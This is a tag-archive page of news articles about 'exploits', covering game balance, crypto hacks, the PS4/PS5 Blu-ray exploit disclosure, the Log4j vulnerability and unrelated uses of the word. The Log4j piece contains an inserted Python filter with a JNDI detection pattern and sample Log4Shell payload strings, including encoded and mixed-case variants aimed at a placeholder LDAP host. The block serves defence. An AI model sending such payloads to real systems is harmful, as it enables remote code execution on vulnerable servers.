Tag Archives: exploits

Diablo 4 devs are embracing “broken” exploits but players aren’t convinced – CharlieINTEL.com

  1. Diablo 4 devs are embracing “broken” exploits but players aren’t convinced CharlieINTEL.com
  2. Diablo 4 head says Blizzard will “embrace,” not insta-nerf, busted stuff like Ball Lightning Sorcerers: “Just let ’em have fun, we’ll deal with it later” Yahoo Entertainment
  3. Diablo 4 dev will “embrace” OP aspects: “let them have their fun” Dexerto
  4. Diablo IV GM Says Overpowered Builds Can Be Really, Really Fun, and Won’t Be Fixed Until Later Wccftech
  5. Diablo general manager wants people to have fun with busted builds Gamereactor UK

Read original article here

Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits – Forbes

  1. Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits Forbes
  2. Microsoft Patch Tuesday Fixes 132 Vulnerabilities, Addresses 6 Zero-Days ExtremeTech
  3. CISA gives US civilian agencies until August 1 to resolve four Microsoft vulnerabilities The Record from Recorded Future News
  4. Indian Computer Emergency Response Team (CERT-In) issues warning of critical vulnerability in Microsoft products, posing security risk OnMSFT.com
  5. Microsoft’s latest Patch Tuesday addresses 6 actively exploited zero-day vulnerabilities TechSpot

Read original article here

Crypto exploits the gray area between securities and commodities regulation, says actor Ben McKenzie – CNBC Television

  1. Crypto exploits the gray area between securities and commodities regulation, says actor Ben McKenzie CNBC Television
  2. SEC Tweet On Coinbase Gets Pounced On By Mark Cuban — Financial Scams ‘Every Minute’ On Twitter, But Not Benzinga
  3. Mark Cuban Takes Aim At Jim Cramer’s Crypto Criticism Amidst SEC Actions CoinGape
  4. Bitcoin whipsaws after SEC sues Coinbase and Binance in two-day span: CNBC Crypto World CNBC Television
  5. SEC sues Binance and founder CZ, and JPMorgan turns to blockchain in India: CNBC Crypto World CNBC Television

Read original article here

The 10 largest crypto hacks and exploits in 2022 saw $2.1B stolen

It’s been a turbulent year for the cryptocurrency industry — market prices have taken a huge dip, crypto giants have collapsed and billions have been stolen in crypto exploits and hacks.

It was not even halfway through October when Chainalysis declared 2022 to be the “biggest year ever for hacking activity.”

As of Dec. 29, the 10 largest exploits of 2022 have seen $2.1 billion stolen from crypto protocols. Below are those exploits and hacks, ranked from smallest to largest.

10: Beanstalk Farms exploit — $76M

Stablecoin protocol Beanstalk Farms suffered a $76 million exploit on April 18 from an attacker using a flash loan to buy governance tokens. This was used to pass two proposals that inserted malicious smart contracts.

The exploit was initially thought to have cost around $182 million as Beanstalk was drained of all its collateral but in the end, the attacker only managed to get away with less than half that.

9: Qubit Finance bridge exploit — $80M

Qubit Finance, a decentralized finance (DeFi) protocol on BNB Smart Chain, had over $80 million worth of BNB (BNB) stolen on Jan. 28 in a bridge exploit.

The attacker duped the protocol’s smart contract into believing they had deposited collateral that allowed them to mint an asset representing bridged Ether (ETH).

They repeated this multiple times and borrowed multiple cryptocurrencies against the unbacked bridged ETH, draining the protocol’s funds.

8: Rari Fuse exploit — $79.3M

Another DeFi protocol called Rari Capital was exploited on April 30 for the sum of roughly $79.3 million.

The attacker exploited a reentrancy vulnerability in the protocol’s Rari Fuse liquidity pool smart contracts, making them call a function on a malicious contract that drained the pools of all crypto.

In September, Tribe DAO, which includes Rari Capital and other DeFi protocols, voted to reimburse affected users from the hack.

7: Harmony bridge hack — $100M

In yet another bridge hack, the Horizon Bridge that links Ethereum, Bitcoin (BTC), and BNB Chain to Harmony’s layer-1 blockchain was drained of around $100 million in multiple cryptocurrencies.

Blockchain forensics firm Elliptic pinned the hack on North Korean cybercriminal syndicate Lazarus Group, as the funds were laundered in a similar way to other known Lazarus attacks.

Lazarus is understood to have targeted Harmony employee login credentials, breaching the platform’s security system and gaining control of the protocol before deploying automated laundering programs to move their ill-gotten gains.

6: BNB Chain bridge exploit — $100M

The BNB Chain was paused on Oct. 6 due to “irregular activity” on the network, which later was revealed as an exploit that drained around $100 million from its cross-chain bridge, the BSC Token Hub.

Initially, it was thought the attacker was able to take around $600 million due to a vulnerability that allowed the creation of roughly two million BNB, the chain’s native token.

Unfortunately for the attacker, roughly $400 million worth of digital assets were frozen on the blockchain, and more was possibly stuck in cross-chain bridges on the BNB blockchain side.

5: Wintermute hack — $160M

United Kingdom-based crypto market maker Wintermute suffered a compromised hot wallet, from which approximately $160 million across 70 tokens was transferred out.

Analysis from blockchain cybersecurity firm CertiK claimed the attack targeted a vulnerable private key that was likely generated by Profanity, an app that lets users generate vanity crypto addresses and that has a known exploit.

According to CertiK, this private key allowed the attacker to call a function that changed the platform’s swap contract to one the hacker controlled.

Conspiracy theories alleging the hack was an “inside job” due to how it was carried out were debunked by blockchain security firm BlockSec, who said the allegations were “not convincing enough.”

4: Nomad token bridge exploit — $190M

On Aug. 2, the Nomad token bridge, which allows users to swap cryptocurrencies across multiple blockchains, was drained by multiple attackers to the tune of $190 million.

A smart contract vulnerability that failed to properly validate transaction inputs was the cause of the exploit.

Multiple users, seemingly both malicious and benevolent, were able to copy the original attacker’s moves to funnel funds to themselves. Around 88% of addresses taking part in the exploit were identified as “copycats” in a report.

Only around $32.6 million worth of funds were able to be intercepted and returned to the protocol by white hat hackers.

3: Wormhole bridge exploit — $321M

The Wormhole token bridge suffered an exploit on Feb. 2 that resulted in the loss of 120,000 Wrapped Ether (wETH) tokens worth $321 million.

Wormhole allows users to send and receive crypto between multiple blockchains. An attacker found a vulnerability in the protocol’s smart contract and was able to mint 120,000 wETH on Solana (SOL) unbacked by collateral and was then able to swap this for ETH.

At the time it was marked as the largest exploit in 2022 and is the third-largest protocol loss overall for the year.

2: FTX wallet hack — $477M

During the start of FTX’s bankruptcy proceedings on Nov. 11 and 12, a series of unauthorized transactions took place at the exchange, with Elliptic suggesting that around $477 million worth of crypto was stolen.

Sam Bankman-Fried said in a Nov. 16 interview that he believed it was “either an ex-employee or somewhere someone installed malware on an ex-employee’s computer” and had narrowed the perpetrator down to eight people before he was shut out of the company’s systems.

Related: 7 biggest crypto collapses of 2022 the industry would like to forget

According to reports, on Dec. 27 the United States Department of Justice launched an investigation into the whereabouts of around $372 million of the missing crypto.

1: Ronin bridge hack — $612M

The largest exploit to take place in 2022 happened on March 23, when the Ronin bridge was exploited for around $612 million — 173,600 ETH and 25.5 million USD Coin (USDC).

Ronin is an Ethereum sidechain built for Axie Infinity, a play-to-earn nonfungible token (NFT) game. Sky Mavis, Axie Infinity’s developers, said the hackers gained access to private keys, compromised validator nodes and approved transactions that drained funds from the bridge.

The U.S. Treasury Department updated its Specially Designated Nationals and Blocked Persons (SDN) list on April 14 to reflect the possibility that Lazarus Group was behind the bridge’s exploit.

The Ronin bridge hack is the largest cryptocurrency exploit to ever take place.

Read original article here

Saylor gets sued, FBI warns about DeFi exploits, and Crypto.com drops $495M sponsorship: Hodler’s Digest, Aug. 28

Coming every Saturday, Hodler’s Digest will help you track every single important news story that happened this week. The best (and worst) quotes, adoption and regulation highlights, leading coins, predictions and much more — a week on Cointelegraph in one link.

Top Stories This Week


DC Attorney General sues Michael Saylor and MicroStrategy for tax evasion

MicroStrategy co-founder Michael Saylor faces charges of evading United States income taxes he allegedly incurred while living in Washington, DC. The office of the region’s attorney general, Karl Racine, has sued Saylor and MicroStrategy on claims that the firm helped Saylor evade over $25 million in DC income tax. The charges, stemming in part from an amendment to DC’s False Claims Act encouraging whistleblowers to report tax evasion, mean Saylor could see $75 million in penalties.


Crypto.com backs out of $495M sponsorship deal with UEFA Champions League: Report

Crypto.com has decided not to go through with a $495 million sponsorship agreement in response to possible regulatory issues. The sponsorship deal with the Union of European Football Associations (UEFA) would have seen Crypto.com advertised in the UEFA Champions League for five seasons. The crypto exchange was reportedly in sponsorship talks after the Champions League removed Gazprom, an energy company owned by the Russian state, as a sponsor. Crypto.com already has several high-profile advertising efforts under its belt, such as a commercial starring American actor Matt Damon.


Indonesia plans to set up its crypto bourse by the end of 2022

Indonesia could have a crypto bourse, also known as a crypto exchange, constructed by its government before 2023 arrives. Initially unveiled in late 2021, the crypto bourse’s completion has taken longer than expected, but the government aims to get things right instead of rushing a launch. “We will make sure that every requirement, procedure and the necessary steps have been taken,” Jerry Sambuaga, Indonesia’s deputy trade minister, told DealStreetAsia.


Tether requests Roche Freedman to be booted from class action

Tether and Bitfinex are still locked in a lawsuit that began in 2019 alleging that the USDT stablecoin was used to manipulate the cryptocurrency market. The legal team for Tether and Bitfinex is seeking that the plaintiff’s legal counsel, the law firm Roche Freedman, be let go from the case due to the firm’s involvement with Kyle Roche — the subject of a recent CryptoLeaks video claiming he misused privileged information to “harm” Ava Labs competitors in exchange for AVAX tokens. Kyle Roche recently moved to dismiss himself from multiple legal cases, including the one involving defendants Bitfinex and Tether. However, the defendants still want the Roche Freedman firm out of the lawsuit completely, in addition to requesting that their private information be destroyed or returned by Roche Freedman.


Central African Republic court says new $60,000 citizenship-by-crypto-investment program is unconstitutional

In July, the Central African Republic (CAR) launched its Sango hub — a new crypto-focused initiative aimed at expanding the adoption of Bitcoin and creating a special economic zone in the Metaverse. The initiative also included the creation of a Bitcoin-backed digital asset called Sango that also allowed foreign nationals to purchase citizenship in the country for $60,000 in crypto, with an equivalent amount of Sango tokens held in collateral for five years. The CAR’s Constitutional Court deemed the efforts unconstitutional, however, noting that citizenship does not have a price tag.


Winners and Losers


At the end of the week, Bitcoin (BTC) is at $20,369, Ether (ETH) at $1,636 and XRP at $0.33. The total market cap is at $1.00 trillion, according to CoinMarketCap.

Among the biggest 100 cryptocurrencies, the top three altcoin gainers of the week are Celsius (CEL) at 36.41%, eCash (XEC) at 20.70% and Lido DAO (LDO) at 18.05%. 

The top three altcoin losers of the week are Helium (HNT) at -24.47%, Avalanche (AVAX) at -10.41% and Arweave (AR) at -9.92%.

For more info on crypto prices, make sure to read Cointelegraph’s market analysis.


Most Memorable Quotations


“Building new things is not for the faint hearted.”

Neil Dundon, founder of CryptoRecruit


“Ethereum is about permissionless innovation, free enterprise, property rights, globalization.”

Ryan Berckmans, member of the Ethereum community


“We eventually came round to the idea at Coinbase that we’re going to have to be agnostic to every chain and token that is coming out. We can’t sit here in our ivory tower only focused on one asset.”

Brian Armstrong, CEO of Coinbase


“I feel that [crypto] cannot be partisan.”

Tom Emmer, member of the U.S. House of Representatives


“Most of crypto is still junk, actually. I mean, with the exception of, I would say, a few dozen tokens, everything else that has been mentioned is either noise or, frankly, it’s just gonna go away.”

Umar Farooq, head of Onyx, JPMorgan’s digital assets unit 


“Cryptocurrencies have taken a life of their own outside of the distributed ledger — and this is the source of the crypto world’s problems.”

Ravi Menon, managing director of the Monetary Authority of Singapore


Prediction of the Week 


Bitcoin squeeze to $23K still open as crypto market cap holds key support

For most of this week, Bitcoin could not decide whether it wanted to stay above or below $20,000, trading north and south of the level numerous times, according to Cointelegraph’s BTC price index.

In a Friday tweet, pseudonymous Twitter user il Capo Of Crypto noted that a possible short squeeze could occur if BTC rose above the $20,700-to-$20,800 price zone. Pending a break of this level, Bitcoin could then hit between $22,500 and $23,000. On the flip side, dropping below $19,500 would likely take the squeeze off the table, especially if the asset continued to drop below $19,000.


FUD of the Week 

FBI issues alert over cybercriminal exploits targeting DeFi

This week, a public service announcement from the United States Federal Bureau of Investigation (FBI) cautioned the public over a proliferation of decentralized finance (DeFi) exploits, stating that those interested in DeFi should be careful. The agency also noted that DeFi platforms should conduct code audits to check for weaknesses. Dwarfing totals from 2020 and 2021 combined, nefarious actors have pilfered more than $1.6 billion via DeFi exploits so far in 2022 per data from CertiK, a blockchain security company.  


Accomplice of ‘Cryptoqueen’ Ruja Ignatova faces extradition to US: Report

British citizen Christopher Hamilton, alleged accomplice of Ruja Ignatova, could see extradition to the U.S. thanks to a ruling from a judge in the United Kingdom. However, the move still requires approval from a U.K. government executive authority. Hamilton allegedly had a hand in the $4 billion OneCoin Ponzi scheme connected to Ruja Ignatova, aka the “Cryptoqueen.” In June, the FBI added Ignatova to the list of its ten most sought-after fugitives. Charges against Hamilton include laundering $105 million in connection to the Ponzi scheme.


Sneaky fake Google Translate app installs crypto miner on 112,000 PCs

The crypto and technology sectors are often riddled with tech traps and scams. One particular effort, ongoing since 2019, is particularly tricky. A certain type of malware named “Nitrokod” sits hidden within counterfeit computer apps and starts mining Monero (XMR), but only after a few days have passed. The malware lies within convincing versions of fake apps, such as a Google Translate app that boasts numerous positive reviews online. An official Google Translate desktop app does not even exist, however, but this malware-infused app has become a top search result. Nitrokod malware has affected over 100,000 devices spanning almost a dozen countries. 


Best Cointelegraph Features

Billions are spent marketing crypto to sports fans — Is it worth it?

“Without explicit use cases tied to the massive dollars paid for sports marketing sponsorships, the branding only leads to logo exposure.”

Get ready for the feds to start indicting NFT traders

Securities and Exchange Commission regulators should move to protect investors from traders who distort the NFT market with manipulative trades — and they probably will soon.

Why interoperability is the key to blockchain technology’s mass adoption

Interoperability enables blockchain networks and protocols to communicate with each other, making it easier for everyday users to engage with blockchain technology.


Read original article here

More details surface on the PS4/PS5 Blu-ray exploits

PlayStation hacker TheFloW gave the scene an electroshock yesterday by revealing an exploit chain using Blu-Ray discs on the PS4 and the PS5. The security researcher stated in his disclosure that these exploits could lead to “trivial kernel exploitation” on the PS4, and pirated discs on the PS5.

Past the initial excitement, we’re left with a lot of questions, for which answers are slowly bubbling up. Here’s what we understand so far. (As always, if there’s something that you feel we got wrong, please let us know in the comments!)

I heard there was big news yesterday. Where’s the hack for my PS4/PS5?

Legendary PlayStation hacker TheFloW revealed a chain of exploits for the PS4 and the PS5 yesterday at a conference, using vulnerabilities in the Blu-Ray driver used by both consoles. Theoretically, these exploits could lead to a Jailbreak on PS4 and possibly pirated discs on the PS5, but:

Nothing’s been released that could be directly leveraged by end users. At this moment, what we have is a (quite precise) explanation of what vulnerabilities exist on the consoles, and where in the firmware code. Compiling all of this information into a working proof of concept for either console is “left as an exercise to the reader”. Then, assuming someone reproduces what TheFloW has described in the report (a kernel panic), this still needs to be combined with further discoveries (such as a kernel exploit) to be turned into a full-fledged Jailbreak.

In other words: it could be months before something usable by the end-user comes out of this. As a good reminder, it took multiple months for seasoned hackers to release a PS4 7.55 Jailbreak after another disclosure from TheFloW back in 2021, despite the disclosure being fairly detailed.

What are the implications of this disclosure for the PS4?

Assuming an actual implementation of the exploit chain gets released:

For people running on Firmware 9.00 or lower, you can already Jailbreak your console. One could imagine that this exploit chain gets paired with existing Kernel exploits (we’re assuming here that the kernel exploit functions can be accessed from within the BD context). TheFloW has stated this exploit is 100% reliable, meaning people would expect a 100% stable Jailbreak on PS4. This would be an improvement compared to the current Jailbreaks, which sometimes require multiple retries due to the randomness of the underlying userland exploit (Webkit exploit).

For people running on Firmwares 9.03/9.04: TheFloW has stated that with this exploit chain successful, Kernel Exploitation is “trivial, as there is no SMEP and one can simply jump to user with a corrupted function pointer”. The way we’re reading this here is that implementing privilege escalation (a Jailbreak for PS4 9.03/9.04) in this context could be very easy. Take this with a pinch of salt: what’s “trivial” to TheFloW might still require a lot of research for other people.

For people running on Firmware 9.50 or above: PlayStation have patched the security holes in 9.50 so there’s nothing for you here. Try to get your hands on a lower firmware PS4 when you get the chance. At the very least, stop updating your console if you expect to Jailbreak it.

Would this exploit mean the return of pirated discs on the PS4, and the need to burn dozens of Blu-Ray discs e.g. for homebrew or emulators?

Most likely not. The fact that the exploit uses Blu-Ray vulnerabilities to run does not limit users to this format after successful exploitation: the Blu-Ray vulnerability is the “entry point” to unlocking the console. Once a Jailbreak is active in RAM, loading homebrew (and yes, pirated games) would most likely work the same way it always has: install it on the console either via USB or FTP from one’s computer, then run it from the PS4 Hard drive.

What does this Blu-Ray exploit mean for PS5 hacking and piracy?

TheFloW initially stated in his report that this exploit chain could easily lead to pirated discs. Because this is not a kernel exploit per se (no full access to the console), actions within the BD context would be limited, but in his report the hacker was confident that this could lead to the creation of pirated discs. The report didn’t mention whether this was for PS4 or PS5, implying both:

The UDF driver https://github.com/williamdevries/UDF is used on the PS4 and PS5 which contains a buffer overflow.[…] With these vulnerabilities, it is possible to ship pirated games on bluray discs. That is possible even without a kernel exploit as we have JIT capabilities.

He has since taken to Twitter in order to clarify this:

So, this is pretty important here, for people who thought this was going to lead to instant piracy: the path to PS5 disc piracy is not straightforward from this point, and it seems the hacker meant specifically PS4 games. It could also be that TheFloW might simply just try to cover himself legally speaking: of all the points in the disclosure, the threat of PS5 piracy is probably the least interesting from a technical level, but the most threatening for Sony’s business.

There still possibly exists a path that leads to disc piracy for the PS5 here. Whether “entrepreneurs” will figure it out quickly and start selling pirated games is anyone’s guess.

As far as hacking goes, this unlocks a pretty significant door inside the PS5’s security, that other hackers might start using to dig into the PS5’s internals. Once that breach is here, this could lead to more discoveries for tinkerers. How soon, depends on how quickly people are able to reproduce, and distribute TheFloW’s findings.

Is the PS3 impacted by these exploits, and if so what would it mean for the PS3?

The PS3 is pretty much hackable for the most part, thanks to PS3Xploit, PS3Hen, and Hybrid Firmwares, but more exploits couldn’t hurt, and might help toward full CFW for the hardware revisions that are still incompatible.

TheFloW has stated the PS3 is impacted by the exploit as well, we imagine because it uses the same driver as its younger sisters. But it’s possible he hasn’t worked on a full-fledged implementation for that console, and that details need to be ironed out. Differences in implementation could mean the exploit chain doesn’t work, or isn’t easy to implement, on the PS3. Zecoxao has told us people are looking into it:

So it’s safe to update my PS5/PS4 to X.XX then?

Well… Although TheFloW states his exploit chain was fixed on PS4 9.50 and PS5 5.00, there are other exploits lurking around on the console that could prove to be required. A PS5 kernel exploit was patched in PS5 4.50 according to Zecoxao, and it could be key to full access to the console. The rule of thumb remains the same: until something concrete is released, avoid updating your console. This is true for PS4 and PS5.

Stay tuned!



Read original article here

Elden Ring: YouTubers find rune farming exploits

When you first start Elden Ring, you don’t have much in the way of armor — at least for some classes. To put it bluntly, you are weak in a harsh world. The way that players level up and increase stats, of course, is by collecting runes. Runes are part-experience points and part currency, and to get powerful, you’ll need to collect a lot of them.

Collecting runes is something that’ll happen throughout the game, even if you aren’t particularly trying. Certain activities and enemies — like clearing guards at Gatefront Ruins — will award a bunch of runes. But if you want a lot of runes really fast, you’ll have to turn to farming. Rune farming.

Naturally, YouTube is already ablaze with some exploits and creative methods to farm runes. YouTuber TagBackTV created a video on a method that can earn players 585,600 runes per hour, he said.

He outlines the method in the video, but essentially, there’s a specific area where the player is able to trigger a boulder. The boulder will roll off the edge of a nearby cliff and gain players thousands of runes. Then you refresh back to the site of grace and do this again. And again and again and again. And there’s no fighting!

Arekkz Gaming has another video for an early Elden Ring rune farm. This one requires some fighting, however, but it’s a relatively simple process for getting lots of runes in a short amount of time. Each kill in this method grants 1,000 runes each.

Polygon, too, has a guide for Elden Ring rune farming. Our guide focuses largely on West Limgrave, the starting location for Elden Ring.

If you’re looking for something that’s less like an exploit and more like an optimized route straight out of Elden Ring’s gate, Boomstick Gaming created a video with instructions for a 15-minute path to being overpowered.

Runes! Runes everywhere!

Read original article here

Log4j is patched, but the exploits are just getting started

Peter Membrey, chief architect of ExpressVPN, remembers vividly seeing the news of the Log4j vulnerability break online.

“As soon as I saw how you could exploit it, it was horrifying,” says Membrey. “Like one of those disaster movies where there’s a nuclear power plant, they find it’s going to melt down, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”

Since the vulnerability was uncovered last week, the cybersecurity world has kicked into overdrive to identify vulnerable applications, detect potential attacks, and mitigate against exploits however possible. Nonetheless, serious hacks making use of the exploit are all but certain.

So far, researchers have observed attackers using the Log4j vulnerability to install ransomware on honeypot servers — machines that are made deliberately vulnerable for the purpose of tracking new threats. One cybersecurity firm reported that nearly half of corporate networks it was monitoring had seen attempts to exploit the vulnerability. The CEO of Cloudflare, a website and network security provider, announced early on that the threat was so bad the company would roll out firewall protection to all customers, including those who had not paid for it. But concrete news on exploitation in the wild remains scarce, likely because victims either don’t know or don’t yet want to acknowledge publicly that their systems have been breached.

What is known for sure is that the scope of the vulnerability is huge. A list of affected software compiled by the Cybersecurity and Infrastructure Security Agency (CISA) — and restricted to only enterprise software platforms — runs to more than 500 items long at time of press. A list of all affected applications would undoubtedly run to many thousands more.

Some names on the list will be familiar to the public (Amazon, IBM, Microsoft), but some of the most alarming issues have come with software that stays behind the scenes. Manufacturers like Broadcom, Red Hat, and VMware make software that enterprise clients build businesses on top of, effectively distributing the vulnerability at a core infrastructural level of many companies. This makes the process of catching and eliminating vulnerabilities all the more difficult, even after a patch for the affected library has been released.

Even by the standards of high-profile vulnerabilities, Log4Shell is hitting an unusually large chunk of the internet. It’s a reflection of the fact that the Java programming language is used widely in enterprise software, and for Java software, the Log4j library is exceedingly common.

“I ran queries in our database to see every customer who was using Log4j in any of their applications,” says Jeremy Katz, co-founder of Tidelift, a company that helps other organizations manage open-source software dependencies. “And the answer was: every single one of them that has any applications written in Java.”

The discovery of an easily exploitable bug found in a mostly enterprise-focused language is part of what analysts have called a “nearly perfect storm” around the Log4j vulnerability. Any one company could be using numerous programs containing the vulnerable library — in some cases, with multiple versions inside one application.

“Java has been around for so many years, and it’s so heavily used within companies, particularly large ones,” says Cloudflare CTO John Graham-Cumming. “This is a big moment for people who manage software within companies, and they will be running through updates and mitigations as fast as they can.”

Given the circumstances, “as fast as they can” is a very subjective term. Software updates for organizations like banks, hospitals, or government agencies are generally conducted on the scale of weeks and months, not days; typically, updates require numerous levels of development, authorization, and testing before making their way into a live application.

In the meantime, mitigations that can be pushed out quickly provide a crucial intermediary step, buying valuable time while businesses large and small scramble to identify vulnerabilities and deploy updates. That’s where fixes at the network layer have a key role to play: since malware programs communicate with their operators over the internet, measures that restrict incoming and outgoing web traffic can provide a stopgap to limit the effects of the exploit.

Cloudflare was one organization that moved quickly, Graham-Cumming explained, adding new rules for its firewall that blocked HTTP requests containing strings characteristic of the Log4j attack code. ExpressVPN also modified its product to protect against Log4Shell, updating VPN rules to automatically block all outgoing traffic on ports used by LDAP — a protocol that the exploit uses to fetch resources from remote URLs and download them onto a vulnerable machine.

“If a customer gets infected, we’ve already seen scanners as a malicious payload, so they might start scanning the internet and infect other people,” says Membrey. “We wanted to put a cap on that, not just for our customers’ sake but for everyone else’s sake — a bit like with Covid and vaccines.”

These changes typically happen faster because they take place on servers belonging to the firewall or VPN companies and require little (if any) action from the end user. In other words, an out-of-date software application could still receive a decent level of protection from an updated VPN — though it’s no substitute for proper patching.
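The two network-layer stopgaps described above, as an added example that is not Cloudflare’s or ExpressVPN’s code: an edge filter that drops requests carrying the JNDI lookup string that Log4Shell relies on (after percent-decoding, case-insensitively), and an egress rule that refuses outbound connections to the standard LDAP ports. The sample requests, the `.invalid` host name and the port list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Standard LDAP ports: 389 (plain) and 636 (LDAPS). Blocking outbound
# connections to them is the stopgap the article attributes to ExpressVPN;
# the exact list is an assumption here, not taken from the article.
LDAP_PORTS = {389, 636}

# The lookup prefix that Log4Shell relies on. Matching is case-insensitive
# and tolerant of stray whitespace around the keyword.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(value: str) -> str:
    """Percent-decode a field until it stops changing (at most three rounds),
    so a lookup string hidden behind URL-encoding is still visible."""
    current = value
    for _ in range(3):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_lookup_fields(request: dict) -> list:
    """Return the names of the request fields that contain a JNDI lookup."""
    return [name for name, value in request.items()
            if JNDI_LOOKUP.search(normalize(value))]


def should_block_request(request: dict) -> bool:
    """Firewall decision: drop any request carrying a JNDI lookup anywhere."""
    return bool(find_lookup_fields(request))


def egress_allowed(dst_port: int) -> bool:
    """Egress decision: refuse outbound connections to LDAP ports so a
    vulnerable host cannot fetch a second stage from a remote directory."""
    return dst_port not in LDAP_PORTS


def scan_requests(requests: list) -> list:
    """Return the indexes of the requests the firewall would have blocked."""
    return [i for i, req in enumerate(requests) if should_block_request(req)]


# Constructed sample requests (not real traffic). Each dict holds the
# fields an edge firewall can inspect: path plus query, and selected headers.
SAMPLE_REQUESTS = [
    {"path": "/index.html", "user-agent": "Mozilla/5.0", "x-forwarded-for": "10.0.0.5"},
    # lookup string carried in a header that the application is likely to log
    {"path": "/login", "user-agent": "${jndi:ldap://lookup.example.invalid/a}"},
    # the same string, percent-encoded inside the query string
    {"path": "/search?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.example.invalid%2Fa%7D",
     "user-agent": "curl/7.79"},
    # mixed case, which a case-sensitive string match would miss
    {"path": "/", "user-agent": "${JnDi:ldap://lookup.example.invalid/b}"},
]

if __name__ == "__main__":
    print("blocked requests:", scan_requests(SAMPLE_REQUESTS))  # [1, 2, 3]
    for port in (443, 389, 636):
        print(f"outbound to port {port} allowed: {egress_allowed(port)}")
```

The egress rule is a stopgap only: it limits what a compromised host can fetch, but does not remove the vulnerable library.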

Unfortunately, given the seriousness of the vulnerability, some systems will be compromised, even with quick fixes deployed. And it may be a long time — years even — before effects are fully felt.

“Sophisticated attackers will exploit the vulnerability, establish a persistence mechanism, and then go dark,” Daniel Clayton, vice president of global cybersecurity services at Bitdefender, says. “In two years’ time, we will hear about big breaches and then subsequently learn that they were breached two years ago.”

The bug in Log4j once more highlights the necessity and challenge of adequately funding open source projects. (A huge amount of tech infrastructure might as well depend on “a project some random person in Nebraska has been tirelessly maintaining since 2003,” as a perennially relevant XKCD comic explains.) Bloomberg reported earlier this week that many of the developers involved in the race to develop a patch for the Log4j library were unpaid volunteers, despite the global use of the software in enterprise applications.

One of the last vulnerabilities to rock the internet, Heartbleed, was similarly caused by a bug in a widely used open-source library, OpenSSL. Following that bug, tech companies like Google, Microsoft, and Facebook committed to putting more money into open source projects that were critical for internet infrastructure. But in the wake of the Log4j fallout, it’s clear that managing dependencies remains a serious security problem — and one we’re not close to solving.

“When you look at most of the big hacks that have happened over the years, it’s not normally something really sophisticated that undoes big companies,” Clayton says. “It’s something that hasn’t been patched.”

Putin exploits Europe’s energy crisis

Russia didn’t cause Europe’s current energy crisis, which has seen natural gas prices spike 5x over last year, but Vladimir Putin seems intent on using it to his advantage.

Why it matters: Gas prices fluctuate with Putin’s every word (they fell Thursday after he signaled supply would increase next month), and the supply crunch has been an uncomfortable reminder of Europe’s reliance on Russian fuel. At least one country, Moldova, is in danger of a very cold winter if Russia turns off the tap.

Driving the news: Putin recently dismissed accusations that Moscow is exploiting the crisis as “utter nonsense, drivel and politically motivated tittle-tattle.”

  • The Kremlin has noted that high prices are actually a risk for Russia because countries could turn to other fuels like coal.
  • But Putin is no stranger to using gas to serve geopolitical purposes, notes Anna Mikulska of Rice University’s Baker Institute, including to increase the dependence of neighboring countries on Russia or to punish countries that move toward the West.

Putin’s envoy to the EU, Vladimir Chizhov, hinted earlier this month that geopolitics were indeed a factor. “Change adversary to partner and things get resolved easier,” Chizhov said, referring to the way the bloc treats Russia.

  • Putin has pushed EU countries to agree to longer-term contracts that will keep them reliant on Russian gas but, he contends, guarantee consistent supply.
  • And he has claimed that one way to ease the supply crunch would be for Germany and the EU to expedite approval of the controversial Nord Stream 2 pipeline, which circumvents Ukraine (Russian gas giant Gazprom has already been shipping less gas via Ukrainian pipelines).
  • The other side: Amos Hochstein, the U.S. special envoy for energy security, dismissed that suggestion, telling reporters on Monday that if Russia has the ability to increase supply, it can do so using existing pipelines.

Between the lines: It’s not clear that Russia could actually ramp up supply enough to “decrease the pain in any significant manner,” says Mikulska. “But Russia has at the very least been trying to exploit these conditions to push their own objectives.”

  • Asked if Russia was using energy as a weapon, Hochstein said: “I think we are getting close to that line, if Russia indeed has the gas to supply and it chooses not to, and it will only do so if Europe accedes to other demands that are completely unrelated.”
  • He added: “The only supplier that can really make a big difference for European energy security for this winter is Russia.”

The big picture: Russian gas remains a major part of the energy mix in many European countries.

  • In Germany, for example, two-thirds of natural gas imports came from Russia as of 2018, and Russian gas accounted for 16% of all energy consumption.
  • In several countries in Eastern Europe, 100% of natural gas supplies come from Russia.

No country is feeling the pinch more acutely than Moldova.

  • The former Soviet republic has a new government that is seeking to turn away from Moscow and toward the West — but has until now been entirely reliant on Russian gas.
  • Moldova’s contract expired at the end of September, at which point Gazprom raised the price and reduced supply when Moldova refused to pay it.
  • The government has declared a state of emergency, said it will negotiate a new contract only if Gazprom lowers its price, and searched frantically for other suppliers — including by sealing a relatively small-scale deal with a Polish firm this week.

Zoom out: The energy crisis has a medley of causes that have little to do with Russia.

  • Supply tightened due to a cold winter followed by a hot summer.
  • Gas production in the EU has long been in decline, and renewables have taken a hit in part due to low winds.
  • Asian demand has sucked up much of the global supply of liquefied natural gas, limiting the potential suppliers for EU countries.

The bottom line: Europe will continue to rely more on Russia for gas than any other source, the Baker Institute’s Mikulska says, for reasons of capacity, proximity and existing infrastructure.

  • But rather than locking in long-term contracts with Russia, several EU countries like Poland have sought to diversify their supply or sign shorter-term agreements, Mikulska says.
  • She says Putin is in danger of overplaying his hand and undermining any claim that Russia is a reliable partner.

Delta variant exploits low vaccine rates, easing of rules

The latest alarming coronavirus variant is exploiting low global vaccination rates and a rush to ease pandemic restrictions, adding new urgency to the drive to get more shots in arms and slow its supercharged spread.

The vaccines most used in Western countries still appear to offer strong protection against the highly contagious delta variant, first identified in India and now spreading in more than 90 other countries.

But the World Health Organization warned this week that the trifecta of easier-to-spread strains, insufficiently immunized populations and a drop in mask use and other public health measures before the virus is better contained will “delay the end of the pandemic.”

The delta variant is positioned to take full advantage of those weaknesses.

“Any suffering or death from COVID-19 is tragic. With vaccines available across the country, the suffering and loss we are now seeing is nearly entirely avoidable,” Dr. Rochelle Walensky, director of the Centers for Disease Control and Prevention, said Thursday in urging more Americans to roll up their sleeves ahead of the mutant’s spread.

Amid concerns about the variant, parts of Europe have reinstated travel quarantines, several Australian cities are in outbreak-sparked lockdowns — and just as Japan readies for the Olympics, some visiting athletes are infected. The mutation is causing worry even in countries with relatively successful immunization campaigns that nonetheless haven’t reached enough people to snuff out the virus.

